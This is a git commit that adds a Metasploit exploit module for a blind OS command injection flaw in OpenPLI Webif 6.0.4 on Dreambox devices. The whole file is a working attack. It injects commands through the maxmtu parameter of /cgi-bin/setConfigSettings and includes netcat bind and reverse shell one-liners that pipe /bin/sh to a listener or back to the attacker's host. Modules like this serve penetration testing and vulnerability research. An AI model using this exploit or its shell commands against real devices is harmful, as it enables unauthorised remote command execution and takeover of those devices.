initial commit

m-1-k-3 · m-1-k-3 · commit 121a736e28ed · 2013-02-16T20:42:02.000+01:00
diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb
@@ -0,0 +1,111 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		   => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution',
+			'Description'	=> %q{
+					Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection.
+
+					Tested on the following box:
+					* Linux Kernel	Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) 
+							#1 Wed Aug 17 23:54:07 CEST 2011
+					* Firmware	release 1.1.0, 27.01.2013
+					* FP Firmware	1.06
+					* Web Interface	6.0.4-Expert - PLi edition by [lite]
+
+					Note: This is a blind os command injection vulnerability. This means 
+					that you will not see any output of your command. Try a ping command 
+					to your local system for a first test.
+			},
+			'Author'		 => [ 'm-1-k-3' ],
+			'License'		=> MSF_LICENSE,
+			'References'	 =>
+				[
+					[ 'URL', 'http://openpli.org/' ],
+					[ 'URL', 'http://openpli.org/wiki/Webif' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
+					[ 'EDB', '24498' ],
+					[ 'OSVDB', '90230']
+				],
+			'Platform'	   => ['unix', 'linux'],
+			'Arch'		   => ARCH_CMD,
+			'Privileged'	 => true,
+			'Payload'		=>
+				{
+					'Space'	   => 1024,
+					'DisableNops' => true,
+					'Compat'	  =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'netcat-e generic'
+						}
+				},
+			'Targets'		=>
+				[
+					[ 'Automatic Target', { }]
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 08 2013'
+		))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+			], self.class)
+	end
+
+	def exploit
+		connect
+
+		payl = datastore['PAYLOAD']
+
+ 		uri = '/cgi-bin/setConfigSettings'
+
+		if payl =~ /bind/
+					cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
+		elsif payl =~ /reverse/
+					cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc #{lhost} #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
+		else
+			#this is for typical command execution ... cmd/unix/generic 
+			cmd = Rex::Text.uri_encode(payload.encoded)
+		end
+
+		vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
+		vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
+
+		data_cmd = "?maxmtu=1500%26#{cmd}%26"
+
+		begin
+			res = send_request_cgi(
+					{
+					'uri'	=> uri << data_cmd,
+					'method' => 'GET',
+				})
+
+		rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+			print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+			return
+		end
+
+		if not res
+			print_error("#{rhost}:#{rport} - HTTP Connection Error, Aborting")
+			return
+		end
+
+		handler
+		disconnect
+	end
+
+end
